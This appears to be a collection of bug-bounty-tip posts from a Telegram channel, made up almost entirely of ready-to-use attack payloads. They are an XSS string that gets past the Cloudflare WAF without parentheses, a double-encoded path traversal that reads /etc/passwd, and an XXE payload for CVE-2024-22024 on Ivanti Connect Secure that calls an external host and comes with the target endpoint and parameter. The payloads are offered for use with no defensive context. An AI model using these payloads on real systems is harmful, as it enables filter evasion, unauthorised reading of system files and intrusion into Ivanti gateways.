Bypass Cloudflare WAF (XSS without parentheses)
#xss #bugbountytips #infosec
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
javascript:var{a:onerror}={a:alert};throw%20document.domain
Bypass Cloudflare WAF (XSS without parentheses) inside an anchor tag
#bugbountytips #bugbounty
javascript:var{a:onerror}={a:alert};throw%20document.domain
Payload:
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
#bugbountytips #bugbounty #CyberSecurity
CVE-2024-22024
XXE on Ivanti Connect Secure
☠️ payload encoded base64:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>
send it to:
127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parameter
#bugbountytips #cve #Ivanti